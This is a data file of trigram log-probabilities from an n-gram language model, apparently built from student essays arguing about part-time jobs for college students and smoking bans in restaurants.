-0.5384965 and justice I
-0.5657586 I wish I
-0.70085645 the U.S. I
-1.0058641 <s> I disagree
-0.7055833 I partially disagree
-0.2141374 I disagree with
-0.6019163 partially disagree with
-0.9506665 questing student with
-1.6654129 -RRB- , with
-0.9374403 parents , with
-0.9374403 colleges , with
-1.810724 Secondly , with
-1.7096972 Finally , with
-0.9374403 challenging , with
-0.9374403 skilled , with
-1.2484614 the case with
-1.2364163 fit in with
-0.9534104 fall in with
-2.1013653 , and with
-1.2205917 personality and with
-0.94509083 past and with
-1.1840563 experience working with
-0.9253351 skills working with
-1.4620533 many students with
-2.029896 college students with
-0.4390715 provide students with
-0.9030033 provides students with
-1.1443504 assist students with
-1.6048807 more time with
-0.9481136 first jobs with
-1.2679636 to work with
-0.19646241 I agree with
-0.32449543 completely agree with
-0.3763395 strongly agree with
-0.32449543 largely agree with
-0.32449543 totally agree with
-1.0599563 To begin with
-0.95303875 positions are with
-0.8756548 social experiences with
-0.69540316 a team with
-0.8493379 are productive with
-0.6775056 the relationships with
-0.6775056 friendly relationships with
-0.9461062 viable people with
-0.8730678 especially true with
-1.3858857 will help with
-1.1046833 to help with
-1.4997087 to do with
-0.5347369 be familiar with
-0.33900368 will interfere with
-0.33900368 jobs interfere with
-0.9249069 group activities with
-1.4483202 college life with
-1.2874727 social life with
-1.0862964 taken up with
-0.8687581 ending up with
-0.5347369 often combines with
-1.1508789 of income with
-0.9169204 still living with
-0.8287243 to communicate with
-0.8756548 be responsible with
-0.69540316 be flexible with
-0.8287243 to fill with
-0.3140839 to cope with
-0.86008275 get out with
-0.42794508 hang out with
-0.91779655 For those with
-0.69540316 in comparison with
-0.8627387 The problem with
-1.219193 their families with
-0.90896845 all day with
-0.6019163 out drinking with
-0.6019163 binge drinking with
-0.5347369 and association with
-0.5347369 ultimately remain with
-0.8287243 being organized with
-0.76558566 temporary basis with
-0.5347369 <s> Along with
-0.76558566 work schedules with
-0.8739768 actually complete with
-0.5347369 get along with
-0.8829232 be spent with
-0.5347369 to interact with
-0.5347369 by interacting with
-0.8820983 provided me with
-0.80544597 study schedule with
-0.5347369 have continued with
-0.5347369 more efficiently with
-0.5347369 are helping with
-0.087491564 , dealing with
-0.23189282 experience dealing with
-0.23189282 especially dealing with
-0.23189282 though dealing with
-0.69540316 example communicating with
-0.5347369 occupying oneself with
-0.8493379 recreational habits with
-0.5347369 hopefully tie-in with
-0.8287243 my claim with
-0.5347369 in cooperation with
-0.69540316 nothing wrong with
-0.5347369 double bonus with
-0.5347369 exhaustion interferes with
-0.5347369 become trapped with
-0.5347369 nationwide boom with
-0.92012227 to restaurants with
-0.5347369 evolving relationship with
-0.5347369 by interfering with
-0.5347369 be burdened with
-0.5347369 work-force coupled with
-0.5347369 not diluted with
-0.5347369 schedules associated with
-0.5347369 college rests with
-0.5347369 be held with
-0.5347369 I interviewed with
-0.5347369 been implemented with
-0.5347369 becomes entangled with
-0.09438104 disagree with this
-0.33191696 agree with this
-0.5369658 reasons for this
-1.366326 is for this
-1.5405154 reason for this
-2.6119888 part-time job this
-0.8991957 therefore upon this
-1.2140353 graduation , this
-1.7340859 work , this
-1.2140353 so , this
-1.2140353 countries , this
-0.9416018 Nevertheless , this
-0.9416018 although , this
-1.2140353 said , this
-2.0019064 <s> In this
-0.92426234 valuable in this
-1.182112 especially in this
-1.3189304 helpful in this
-0.92426234 survive in this
-0.92426234 progress in this
-2.3421571 , and this
-1.24806 responsibility and this
-1.4483817 level of this
-0.9371589 benefits of this
-1.5330589 all of this
-1.2057524 result of this
-1.4635594 member of this
-0.96367604 answer to this
-0.96367604 similarities to this
-1.2611108 <s> For this
-0.9573892 Apart from this
-0.96097445 action on this
-1.3506871 and then this
-0.88054943 time but this
-1.1059301 work but this
-0.87144387 universities consider this
-0.929042 because at this
-0.929042 unit at this
-0.9315946 By doing this
-1.244445 to do this
-2.0057971 I believe this
-0.8397957 themselves during this
-0.8397957 goal during this
-0.53858435 to maintain this
-0.92397624 emphatically support this
-1.3360801 I feel this
-0.9380305 help ease this
-0.838894 Even though this
-1.1308596 <s> Perhaps this
-1.238985 , since this
-1.3393935 reasons why this
-0.53858435 I admit this
-1.040849 us realize this
-0.7009841 should recognize this
-0.838894 , certainly this
-0.83632827 <s> Doing this
-0.53858435 <s> Interrupting this
-0.53858435 <s> Disrupting this
-0.7009841 simply distract this
-0.53858435 <s> Keeping this
-0.1721986 with this statement
-1.2525237 with the statement
-1.7855558 against the statement
-2.309394 <s> The statement
-1.1388981 the above statement
-0.42091483 this statement for
-0.7177357 above statement for
-0.8929262 more reasons for
-0.7874274 two reasons for
-0.9943556 main reasons for
-1.0563738 three reasons for
-1.4944385 understand that for
-1.8981637 part-time job for
-1.3720853 full-time job for
-1.1079654 any job for
-1.7610698 time job for
-0.9324332 necessary is for
-1.845926 It is for
-0.9324332 purpose is for
-0.15084541 valuable preparation for
-0.15084541 and preparation for
-0.15084541 good preparation for
-0.15084541 effective preparation for
-0.8755664 even full-time for
-1.6979122 students will for
-1.6815472 job , for
-1.4819789 student , for
-1.3527664 cases , for
-0.9053896 in , for
-1.1485188 restaurant , for
-1.5467778 work , for
-1.4497615 skills , for
-0.9053896 position , for
-1.2735283 friends , for
-1.3527664 addition , for
-1.1485188 possible , for
-1.1485188 end , for
-0.9053896 demons , for
-0.94140446 studies not for
-0.9451128 style and for
-1.6869276 go to for
-1.7908659 to study for
-1.0955393 and studying for
-1.2042238 on studying for
-1.3789804 valuable experience for
-1.3021469 life experience for
-1.3446298 , working for
-1.1398095 of working for
-0.8430071 as working for
-0.8430071 unhappiness working for
-0.54454136 ample reason for
-0.54454136 good reason for
-0.54454136 other reason for
-0.6343255 main reason for
-0.54454136 significant reason for
-0.5208086 a time for
-0.7114771 fs time for
-0.89037335 arranging time for
-0.89037335 opportune time for
-1.1112103 in school for
-2.069486 to work for
-0.9150423 income -LRB- for
-1.3662076 , but for
-1.049825 not only for
-0.87492377 used only for
-0.5469526 it necessary for
-0.5548569 is necessary for
-0.5469526 are necessary for
-0.5469526 financially necessary for
-0.47942734 and pay for
-0.43821508 to pay for
-0.47942734 students pay for
-0.3791692 help pay for
-0.47942734 them pay for
-0.8578552 the fees for
-1.0702064 enough money for
-1.1181052 need money for
-1.2153544 earn money for
-0.8064731 get money for
-1.1584615 save money for
-1.5568779 <s> And for
-0.7177357 as bad for
-0.7177357 so bad for
-0.7562072 employment market for
-0.8528046 it does for
-0.91749346 candidates even for
-0.5340118 the foundation for
-0.46128714 real foundation for
-0.6874113 work history for
-0.6874113 poor candidate for
-0.8345 be better for
-0.8345 is better for
-1.2066886 their skills for
-0.18866794 is important for
-0.31676692 not important for
-0.23167701 very important for
-0.54089487 only important for
-0.6298459 so important for
-0.6298459 are important for
-0.41808233 fs important for
-0.54089487 extreme important for
-0.54089487 necessarily important for
-0.54089487 indeed important for
-0.54089487 terribly important for
-0.8560704 safety issue for
-0.91225535 save enough for
-1.0377406 this need for
-1.0377406 the need for
-0.41920686 be good for
-0.84577477 fs good for
-0.75781655 bad idea for
-0.64838374 good idea for
-1.8564329 their parents for
-0.8610918 particularly true for
-1.9295031 to do for
-0.84368944 first chance for
-0.626021 an opportunity for
-0.45628625 important opportunity for
-0.45628625 good opportunity for
-0.45628625 wonderful opportunity for
-0.7349327 benefit them for
-0.39060903 prepares them for
-0.8833846 preparing them for
-0.7349327 interest them for
-1.0046635 assist them for
-0.7349327 prepare them for
-0.8719379 be useful for
-0.69552195 being done for
-0.69552195 things done for
-0.9748734 not fit for
-0.9302548 one get for
-0.5292007 woefully unprepared for
-0.8924875 important responsibilities for
-0.84368944 be used for
-0.83799046 often late for
-1.1181374 be difficult for
-0.7951765 of cash for
-0.8946644 needed income for
-0.9005147 great way for
-0.5225355 being responsible for
-0.5225355 institutions responsible for
-0.5225355 Being responsible for
-0.7951765 good arguments for
-0.7562072 working '' for
-1.5688201 the value for
-0.69859153 promotes value for
-0.5292007 the passion for
-0.8610918 is great for
-0.6874113 our stand for
-0.7562072 or contacts for
-1.1763914 the best for
-0.9136367 that matter for
-0.7951765 prepare him for
-1.1588516 very hard for
-1.3340806 <s> Working for
-0.9136367 course material for
-0.7951765 of concern for
-0.8203553 working hold for
-0.5292007 to traverse for
-0.83513504 good things for
-1.1243541 these things for
-0.5292007 are paying for
-0.8203553 monthly rent for
-1.0737171 be made for
-0.6874113 Getting ready for
-1.1366102 the day for
-0.6874113 causing lost for
-0.787526 having responsibility for
-0.40722078 take responsibility for
-0.5292007 an identity for
-0.5292007 to handle for
-0.8705034 to independence for
-0.7951765 very positive for
-0.5378425 is common for
-0.6874113 of applications for
-0.54051083 job possibilities for
-0.54051083 career possibilities for
-0.5292007 an aptitude for
-0.7562072 richer basis for
-0.83799046 waiting around for
-0.6985951 is essential for
-0.5960629 sleep essential for
-0.7562072 fs budget for
-0.9136367 a distraction for
-0.6874113 necessary conditions for
-0.5292007 No excuses for
-1.17688 the right for
-0.7858867 truly right for
-0.8560704 and save for
-0.54051083 and respect for
-0.54051083 much-needed respect for
-0.8203553 this policy for
-0.6874113 is mainly for
-0.5378425 to prepare for
-0.5292007 better prepared for
-0.7562072 is critical for
-0.5292007 have empathy for
-0.5974354 are required for
-0.5974354 absolutely required for
-0.5292007 no replacement for
-0.5292007 a struggle for
-0.45125908 to look for
-0.5960629 employers look for
-0.5292007 , looking for
-0.7562072 significant expense for
-0.7562072 student loan for
-0.82265806 and materials for
-0.7562072 be low for
-0.759522 be rewarding for
-0.7951765 really wanted for
-0.5292007 more options for
-0.5292007 and grandparents for
-0.5292007 in exchange for
-0.5292007 to arrange for
-0.46128714 everything paid for
-0.46128714 already paid for
-0.5292007 <s> Searching for
-0.5292007 and begging for
-0.5292007 be traumatizing for
-0.5292007 permanent bond for
-0.5292007 working dogs for
-0.5292007 is ideal for
-0.5292007 so disparate for
-0.5292007 when applying for
-0.5292007 the chances for
-0.5292007 headlong charge for
-0.5292007 a tool for
-0.6874113 merely finishing for
-0.5292007 and carrying for
-0.5292007 have availability for
-1.3005892 second-hand smoke for
-0.5292007 ventilated room for
-0.6874113 reasonable justification for
-0.6874113 too smoky for
-0.5292007 seek treatment for
-1.6239449 statement for several
-1.8080971 , for several
-0.93188775 and for several
-1.1960192 school for several
-2.2302954 can be several
-1.2695282 attendant , several
-1.9413931 <s> For several
-1.653497 there are several
-2.0937102 There are several
-0.895713 jobs offer several
-2.1425383 to do several
-0.8766979 Why waste several
-1.4082516 I had several
-0.17254661 for several reasons
-0.59077865 For several reasons
-0.69191444 are several reasons
-1.2595067 For the reasons
-1.6376215 all the reasons
-1.7060202 are many reasons
-1.2561314 list of reasons
-0.9260106 number of reasons
-2.2605135 <s> The reasons
-0.44694287 for financial reasons
-0.656295 the following reasons
-0.9197985 gives more reasons
-0.9197985 far more reasons
-0.18785457 for two reasons
-0.2864937 have two reasons
-0.2864937 following two reasons
-0.32457042 are two reasons
-0.2864937 these two reasons
-0.6782402 the main reasons
-0.39012584 two main reasons
-0.24154592 For these reasons
-0.84276944 for various reasons
-0.3920536 For three reasons
-0.5528344 have three reasons
-0.24584863 following three reasons
-0.3920536 are three reasons
-1.2401941 are my reasons
-0.5665353 the above reasons
-0.7038017 many excellent reasons
-1.4045504 I disagree .
-0.49357885 for this .
-0.8107263 believe this .
-0.8107263 realize this .
-0.6846582 this statement .
-1.379179 money for .
-0.8960209 hard for .
-1.1322505 paid for .
-0.295592 several reasons .
-0.43527922 of reasons .
-0.664778 financial reasons .
-0.43527922 following reasons .
-0.62383306 two reasons .
-0.56914186 various reasons .
-0.54445565 three reasons .
-0.73059213 from it .
-0.73059213 accomplish it .
-0.73059213 have it .
-0.73059213 into it .
-0.8772875 doing it .
-0.8772875 earn it .
-0.73059213 get it .
-0.73059213 hinder it .
-0.73059213 rush it .
-0.73059213 repay it .
-1.4932667 work part-time .
-0.8785951 a job .
-0.61936116 part-time job .
-1.0975626 the job .
-0.80918926 time job .
-0.9005563 's job .
-0.9667227 first job .
-0.9005563 good job .
-0.74706256 particular job .
-0.74706256 her job .
-1.489515 it is .
-1.1554924 a student .
-1.2609388 the student .
-1.2552696 college student .
-0.7922149 productive student .
-0.96636486 individual student .
-0.41145796 upon graduation .
-0.17986998 their graduation .
-0.3733292 following graduation .
-0.4249236 after graduation .
-0.3733292 her graduation .
-1.6125562 do not .
-0.5277839 the case .
-0.6069651 to case .
-0.43513206 for employment .
-0.54179215 part-time employment .
-0.50325406 full-time employment .
-0.50325406 of employment .
-0.50325406 time employment .
-0.26768222 future employment .
-0.43513206 subsequent employment .
-1.1636539 fit in .
-1.1636539 engaging in .
-0.53835267 chosen field .
-0.53835267 career field .
-0.53835267 respective field .
-0.53835267 his\/her field .
-0.53835267 appropriate field .
-1.397409 expected to .
-0.70732135 for study .
-0.8450061 and study .
-0.42896888 of study .
-0.59028286 to study .
-0.70732135 good study .
-0.34125715 is studying .
-0.70302737 and studying .
-0.7438299 on studying .
-0.7438299 time studying .
-0.8656683 while studying .
-0.70302737 were studying .
-0.7484637 mechanical engineering .
-0.6160079 job experience .
-0.72400934 on experience .
-0.7091416 work experience .
-0.72400934 college experience .
-0.6160079 some experience .
-0.72400934 useful experience .
-0.6160079 relevant experience .
-0.72400934 actual experience .
-0.6160079 learning experience .
-1.1322653 borrowed from .
-0.90298533 for working .
-0.74876696 not working .
-1.0071001 and working .
-0.9695527 students working .
-0.90298533 while working .
-0.74876696 than working .
-0.7975685 a restaurant .
-0.947394 the restaurant .
-0.8905562 served there .
-1.0849273 for students .
-1.0940471 of students .
-1.0662119 to students .
-0.78037727 as students .
-0.78037727 on students .
-0.9488044 school students .
-0.78037727 such students .
-1.3402902 college students .
-0.64520156 university students .
-1.0940471 young students .
-0.78037727 8,000 students .
-0.78037727 unproductive students .
-0.6069651 cause stress .
-0.6069651 added stress .
-1.2498708 it on .
-1.1306587 moving on .
-0.5157006 of studies .
-0.53724647 their studies .
-0.59912324 on studies .
-0.40237722 's studies .
-0.5157006 academic studies .
-0.59912324 my studies .
-0.59912324 his studies .
-0.5157006 daily studies .
-1.1732457 their time .
-1.0800745 on time .
-1.135574 more time .
-0.617831 same time .
-1.1340048 full time .
-0.9526299 takes time .
-0.9526299 transitional time .
-0.7829694 reasonable time .
-0.5507813 part-time jobs .
-0.47453338 time jobs .
-0.8301784 regular jobs .
-0.8872637 having one .
-0.77748513 physically tired .
-1.0576631 the focus .
-0.58467734 the school .
-0.40699768 in school .
-0.58467734 to school .
-0.50374496 on school .
-0.45111966 at school .
-0.30025434 after school .
-0.58467734 particular school .
-0.50374496 quit school .
-0.50374496 cram school .
-0.58467734 attending school .
-0.752509 part-time work .
-1.0688471 of work .
-0.9700501 to work .
-0.89401615 their work .
-0.7424593 should work .
-0.89401615 extra work .
-0.7424593 or work .
-0.7424593 future work .
-0.528196 hard work .
-0.7424593 regular work .
-0.50325936 being produced .
-0.8965931 and such .
-0.37338907 ? -RRB- .
-0.6845809 fees -RRB- .
-0.6845809 environment -RRB- .
-0.6845809 questions -RRB- .
-0.95817447 are pursuing .
-1.5916259 they should .
-0.8511824 or necessary .
-1.8459793 for college .
-0.69476753 in college .
-0.7343893 leave college .
-0.94590425 through college .
-0.5827514 at college .
-0.32396242 after college .
-0.7343893 afford college .
-0.7343893 finish college .
-0.7343893 attending college .
-0.7343893 throughout college .
-1.6480026 they have .
-0.3572138 for money .
-0.8466983 of money .
-0.26315156 making money .
-0.67504656 earn money .
-0.7596949 earning money .
-0.6435809 without money .
-0.47847462 pocket money .
-0.7596949 my money .
-0.6435809 choose money .
-0.7596949 prize money .
-0.8027881 they say .
-0.8690722 Thank you .
-1.2939248 for some .
-0.41742966 taste bad .
-0.8027881 difficulties begin .
-0.81157017 happing today .
-0.6793639 or degree .
-0.6793639 four-year degree .
-0.61984944 this well .
-0.61984944 it well .
-0.5410564 as well .
-0.61984944 pays well .
-0.8903465 themselves are .
-0.5346242 a career .
-0.429515 their career .
-0.4966902 future career .
-0.4966902 successful career .
-0.429515 my career .
-0.429515 targeted career .
-0.5011351 practical experiences .
-0.5011351 learning experiences .
-0.5011351 invaluable experiences .
-1.0057445 to offer .
-0.68226635 financial benefit .
-0.68226635 another benefit .
-0.5413015 the future .
-0.46826607 their future .
-0.73786956 my future .
-0.6267783 brighter future .
-0.8032087 will consider .
-0.51694524 work skill .
-0.51694524 life skill .
-0.8485394 purely academic .
-0.8455552 time more .
-0.8455552 want more .
-0.8235534 potential employers .
-0.85266644 the better .
-0.7484637 the organization .
-1.0071819 the industry .
-0.64565223 study skills .
-0.7624031 interpersonal skills .
-0.64565223 management skills .
-0.42623967 social skills .
-0.64565223 personal skills .
-0.80951875 these skills .
-0.64565223 employability skills .
-1.2777508 is important .
-0.7238629 and important .
-0.9289007 more important .
-0.86788344 all important .
-0.7238629 personally important .
-0.7133119 potential employer .
-0.6373454 time management .
-0.46671915 financial management .
-0.46671915 business management .
-0.85575247 are taking .
-0.50325936 criticism positively .
-1.0718262 go through .
-0.7867131 not productive .
-0.68192095 it themselves .
-0.68192095 positions themselves .
-0.68192095 teach themselves .
-0.8375578 school environment .
-0.61202127 a position .
-0.5011351 graduate position .
-0.5011351 each position .
-0.7133119 their abilities .
-1.4454706 the same .
-0.68226635 benefiting financially .
-0.68226635 succeed financially .
-0.64280033 the issue .
-0.46671915 money issue .
-0.46671915 big issue .
-0.86383677 fast enough .
-1.1841305 the food .
-0.56869084 at times .
-0.56869084 vacation times .
-0.987681 this need .
-0.987681 they need .
-0.50325936 an emergency .
-0.664216 is earned .
-0.664216 have earned .
-0.85529745 and good .
-0.703099 good idea .
-0.9310391 with others .
-0.68518823 many others .
-0.7976186 is like .
-0.63745725 the like .
-0.63745725 tastes like .
-0.8204796 their parents .
-0.99843067 your parents .
-0.8901183 with friends .
-0.73970604 and friends .
-0.63991165 crucial relationships .
-0.80117214 workplace relationships .
-1.0943304 of people .
-0.96615595 young people .
-0.78051484 rounded people .
-0.78051484 rights people .
-0.80718005 is true .
-1.0119214 from College .
-0.65054137 financially stable .
-1.3397994 I do .
-0.83771735 doing something .
-0.76881135 an advantage .
-0.86028135 too high .
-0.8576102 attend classes .
-1.1169974 n't know .
-0.20840219 don ft. .
-0.20840219 doesn ft. .
-0.20840219 hadn ft. .
-1.3532796 at all .
-1.1163046 for them .
-0.62139887 to them .
-0.74332404 kill them .
-0.74332404 serve them .
-0.74332404 impress them .
-0.50325936 their futures .
-0.5662341 the society .
-0.5956286 in society .
-0.4393193 of society .
-0.5662341 to society .
-0.4883827 broader society .
-0.5662341 modern society .
-0.65054137 highly specialized .
-0.50325936 of contexts .
-0.76881135 of specialty .
-0.7710068 by itself .
-0.50325936 with specialization .
-0.65054137 chosen fields .
-0.32336983 of temptation .
-0.32336983 sample temptation .
-1.0462253 social activities .
-0.7932434 community activities .
-0.50325936 students socialize .
-0.50325936 unpredictable results .
-0.65054137 and teachers .
-0.7484637 society demands .
-0.39026454 for life .
-0.53280646 in life .
-0.39026454 of life .
-0.66592014 their life .
-0.66592014 school life .
-0.5452266 college life .
-0.570058 real life .
-0.7773271 fs life .
-0.32918224 daily life .
-0.570058 private life .
-0.48235404 the workforce .
-0.52737445 additional responsibilities .
-0.73530406 social responsibilities .
-0.78031975 leave university .
-0.40502557 through university .
-0.8713421 passed up .
-0.7484637 be sleeping .
-0.50325936 immediate repercussions .
-1.063004 often difficult .
-0.7484637 adult lifestyle .
-0.38657898 very helpful .
-0.91357267 this regard .
-0.68226635 family finances .
-0.68226635 his finances .
-0.65054137 finances responsibly .
-1.1189742 credit cards .
-0.79230475 tuition loans .
-0.61316794 , etc. .
-0.44241893 uniforms etc. .
-0.50325936 financial peril .
-0.7417742 an income .
-0.7417742 extra income .
-0.50325936 such debts .
-0.5602273 living expenses .
-0.6390361 with family .
-0.26203418 their family .
-0.6390361 own family .
-1.071505 an adult .
-0.5803078 and development .
-0.5803078 adult development .
-1.073351 become independent .
-0.43274358 they graduate .
-0.78140795 we graduate .
-0.81818664 educated professional .
-0.62786806 for customers .
-0.78382015 of customers .
-0.62786806 handling customers .
-0.8197677 and responsible .
-0.3000333 academic achievement .
-0.65054137 of necessity .
-0.815245 economical sense .
-0.88206494 work force .
-0.50325936 of staff .
-0.5214464 personal situation .
-0.5214464 own situation .
-0.4167356 the year .
-0.6039533 of education .
-0.3926142 their education .
-0.545997 an education .
-0.40555257 college education .
-0.4714027 's education .
-0.4714027 advanced education .
-0.4714027 proper education .
-0.4714027 our education .
-0.4714027 further education .
-0.4714027 incomplete education .
-0.74969053 the world .
-0.7251747 working world .
-0.76822126 academic world .
-0.85924894 real world .
-0.7251747 adult world .
-0.69812334 considerable success .
-0.83242613 academic success .
-0.95817447 smoking entirely .
-0.63991165 its importance .
-0.63991165 utmost importance .
-1.0488918 his own .
-0.50325936 own pockets .
-0.8027881 this transition .
-0.56869084 the campus .
-0.43500805 on campus .
-0.50325936 are cultivated .
-0.8451183 live without .
-0.8541513 all about .
-0.50325936 salable product .
-0.75616264 is limited .
-0.7484637 class assignments .
-0.7982902 help either .
-0.3697228 , too .
-0.674335 bad too .
-0.674335 life too .
-0.65054137 most complicated .
-0.46671915 or business .
-0.46671915 about business .
-0.46671915 ' business .
-0.76881135 work ethic .
-1.5568883 to learn .
-0.6433213 important lessons .
-0.6433213 beneficial lessons .
-0.50325936 be exhausting .
-0.50325936 priorities straight .
-1.1014975 to quit .
-0.28301305 be beneficial .
-0.46671915 job beneficial .
-0.46671915 personally beneficial .
-1.1137376 as possible .
-0.776974 later years .
-0.776974 senior years .
-0.7133119 of medicine .
-0.82945204 give three .
-0.7133119 life lesson .
-0.84143203 used before .
-0.65054137 from organizations .
-0.50325936 college gates .
-1.1286163 to meet .
-1.0399125 something new .
-0.85632753 there against .
-0.7484637 work load .
-0.51694524 their performance .
-0.51694524 academic performance .
-0.99687827 their books .
-0.50325936 a hindrance .
-0.8287384 never worked .
-0.6954135 really worked .
-0.65054137 lower workload .
-0.42071033 financial needs .
-0.58183706 the costs .
-0.6462078 tuition costs .
-0.98288625 to afford .
-0.44241893 educational process .
-0.44241893 learning process .
-0.7710068 the system .
-0.53399396 into practice .
-0.2624939 as adults .
-0.424702 responsible adults .
-0.424702 mature adults .
-0.50325936 college counterparts .
-0.97546875 a problem .
-0.81818664 day since .
-0.7133119 be concerned .
-0.65054137 less sophisticated .
-0.79230475 an effect .
-0.4654606 the workplace .
-0.73722285 f workplace .
-0.815245 studies instead .
-0.85325277 course material .
-0.7484637 principle concern .
-0.65054137 full-time worker .
-0.424702 money problems .
-0.424702 serious problems .
-0.424702 respiratory problems .
-1.0845375 their families .
-0.50325936 courses began .
-0.95817447 so far .
-0.50325936 fully immersed .
-0.7133119 to rest .
-1.0111022 their lives .
-0.38277295 working lives .
-1.1328908 they want .
-0.7520951 we want .
-0.7279554 many things .
-0.7279554 other things .
-0.6190821 those things .
-0.3489827 new things .
-0.50325936 of drinks .
-0.7484637 study harder .
-0.65054137 to suffer .
-0.44241893 be fun .
-0.44241893 having fun .
-0.95817447 simple tasks .
-0.50325936 n't fatal .
-0.5645745 in Japan .
-0.60063195 in America .
-0.60063195 North America .
-0.53198135 in freedom .
-0.61893153 of freedom .
-0.53198135 more freedom .
-1.0723064 to think .
-0.8032087 do anything .
-1.1815065 reasons why .
-0.91210526 to attend .
-0.30621156 time wisely .
-0.51694524 spend wisely .
-0.50325936 precious commodity .
-1.1585519 20 hours .
-0.65054137 <s> 5 .
-0.6101753 student days .
-0.7956457 college days .
-0.911714 these days .
-0.93419963 a week .
-0.8841455 per week .
-0.7484637 quit easily .
-0.5252333 that day .
-0.6107019 the day .
-0.5252333 one day .
-0.5252333 each day .
-0.65054137 and coworkers .
-0.50325936 rapidly underway .
-0.8578608 get home .
-0.5349836 of responsibility .
-0.7504482 financial responsibility .
-1.0482935 doing homework .
-0.65054137 properly completed .
-0.7133119 at lunch .
-0.7133119 fve mentioned .
-0.7115423 to person .
-0.7115423 better person .
-0.50325936 early twenties .
-0.50325936 of remuneration .
-1.0919538 financial independence .
-0.7133119 and easier .
-0.85325277 to ask .
-0.50325936 Technology Sydney .
-0.80718005 change companies .
-0.65054137 perfect test .
-0.76881135 their character .
-0.65054137 positive thing .
-0.11020566 the economy .
-0.20840219 local economy .
-0.20840219 general economy .
-0.50325936 stay attached .
-0.7133119 very common .
-0.5857135 in class .
-0.50325936 and faculty .
-1.0184579 the individual .
-0.7206579 responsible individual .
-0.65054137 to coursework .
-0.8233063 and discipline .
-0.50325936 to details .
-0.7484637 their co-workers .
-0.5563739 and age .
-0.5563739 earlier age .
-0.5563739 correct age .
-0.65054137 made clear .
-0.65054137 of finance .
-0.51694524 and resources .
-0.51694524 economic resources .
-0.50325936 or copywriting .
-0.65054137 an office .
-0.50325936 a newcomer .
-0.50325936 and mentoring .
-0.50325936 are career-oriented .
-0.50325936 a branch .
-0.50325936 human beings .
-0.33312583 this opinion .
-0.44134372 the opinion .
-0.83085275 my opinion .
-0.7982902 around us .
-0.65054137 live under .
-1.0603516 be allowed .
-0.65054137 any conditions .
-0.50325936 fs fate .
-0.65054137 for generations .
-0.50325936 be irreversible .
-0.50325936 entire nation .
-0.50325936 the production .
-0.50325936 their agendas .
-0.50325936 be accepted .
-0.8453387 job right .
-0.50325936 perfect self-improvement .
-0.7484637 curious stage .
-0.50325936 financially self-supporting .
-0.65054137 a whole .
-0.86640126 the youth .
-0.65054137 their schooling .
-0.65054137 relaxation purposes .
-0.7133119 be desired .
-0.76881135 the classroom .
-0.81993985 a balance .
-0.65054137 three points .
-0.65054137 and socially .
-0.6060957 their careers .
-0.5214464 professional careers .
-0.65054137 multicultural cities .
-0.50325936 college ends .
-0.65054137 one stronger .
-0.50325936 her actions .
-0.77748513 time together .
-0.7227986 in lectures .
-0.50325936 their degrees .
-0.7133119 very expensive .
-0.7133119 are busy .
-0.50325936 busy professionals .
-0.50325936 other sources .
-0.65054137 degree faster .
-0.82629454 their children .
-0.63991165 his children .
-1.2318772 I had .
-0.50325936 local pharmacy .
-0.65054137 <s> 1 .
-0.7133119 <s> 2 .
-0.7133119 <s> 3 .
-0.91210526 a resume .
-0.65054137 <s> 4 .
-0.76881135 to survive .
-0.65054137 of vacation .
-0.65054137 career path .
-0.50325936 their homework\/assignments .
-0.7484637 are using .
-0.65054137 own initiative .
-0.5160897 the customer .
-0.81157017 unreasonable spending .
-0.7133119 be welcome .
-0.7133119 of research .
-0.65054137 their professor .
-0.65054137 some merit .
-0.94454867 educational materials .
-0.9889069 at large .
-0.65054137 environment changes .
-0.81818664 to me .
-0.7710068 original goal .
-0.44241893 very rewarding .
-0.44241893 quite rewarding .
-0.65054137 there everyday .
-0.50325936 the bill .
-0.50325936 summer vacations .
-0.7710068 the employees .
-0.50325936 to multi-task .
-0.50325936 an assignment .
-0.7133119 financial difficulties .
-0.50325936 of yourself .
-0.44241893 simply entertainment .
-0.44241893 including entertainment .
-0.50325936 hotel porter .
-0.44241893 these opinions .
-0.27126983 three opinions .
-0.32336983 a textbook .
-0.32336983 the textbook .
-0.50325936 a lifetime .
-0.50325936 about glife .
-0.7133119 and clothes .
-0.7484637 study groups .
-0.65054137 social etiquette .
-0.50325936 spoken language .
-0.7484637 at weekends .
-0.50325936 work regimen .
-0.50325936 as absurd .
-0.95817447 bad habits .
-0.7133119 learning online .
-0.50325936 bear mentioning .
-0.50325936 as failure .
-0.32336983 and desires .
-0.32336983 fs desires .
-0.50325936 right track .
-0.76881135 my claim .
-0.50325936 life-skill enhancements .
-0.32336983 is involved .
-0.32336983 everyone involved .
-0.50325936 mental state .
-0.65054137 the population .
-0.65054137 loan institutes .
-0.3000333 or guardians .
-0.50325936 household earners .
-0.65054137 opinion anyway .
-0.65054137 almost negligible .
-0.50325936 be fine .
-0.50325936 ' discretion .
-0.50325936 or casework .
-0.6639529 's health .
-0.6639529 own health .
-0.6639529 physical health .
-0.50325936 light bulb .
-0.50325936 be cherished .
-0.75616264 new ideas .
-0.50325936 their peers .
-0.65054137 their exams .
-0.65054137 grow larger .
-0.50325936 a threat .
-0.7484637 jobs properly .
-0.65054137 from exhaustion .
-0.7133119 profits heavily .
-0.65054137 and smaller .
-0.65054137 and nightclubs .
-0.76881135 Las Vegas .
-0.76881135 a diploma .
-0.50325936 addictive drug .
-0.50325936 cash prizes .
-0.50325936 parents proud .
-0.65054137 term goals .
-0.50325936 working holiday .
-0.7133119 or partying .
-0.50325936 partying funds .
-0.7130377 in restaurants .
-0.3112425 all restaurants .
-0.68192095 includes restaurants .
-0.50325936 and short-sighted .
-0.50325936 teaching assistants .
-0.50325936 and mastered .
-0.50325936 new barricades .
-0.50325936 our cobblestones .
-0.50325936 be discouraged .
-0.50325936 United States .
-0.50325936 time consuming .
-0.50325936 healthy existence .
-0.7710068 will eat .
-0.50325936 finishing sake .
-0.50325936 and analysis .
-0.65054137 times past .
-0.65054137 mundane worries .
-0.50325936 will falter .
-0.50325936 their schoolwork .
-0.50325936 becoming overwhelmed .
-0.50325936 a doctor .
-0.7484637 examined here .
-0.50325936 in volume .
-0.50325936 shift afterwards .
-0.50325936 even pessimism .
-0.50325936 their perspective .
-0.61913055 of smoking .
-0.61913055 themselves smoking .
-0.61913055 always smoking .
-0.61913055 regular smoking .
-0.61913055 discourage smoking .
-0.50325936 middle route .
-0.6359399 of smoke .
-0.7499746 to smoke .
-0.6359399 still smoke .
-0.6359399 secondhand smoke .
-0.76881135 and well-being .
-0.85325277 restaurant patrons .
-0.50325936 non-smoking establishment .
-0.50325936 them sick .
-0.65054137 law everywhere .
-0.65054137 perfectly justified .
-0.50325936 healthy citizens .
-0.51694524 on non-smokers .
-0.51694524 are non-smokers .
-0.32336983 banned altogether .
-0.32336983 restaurants altogether .
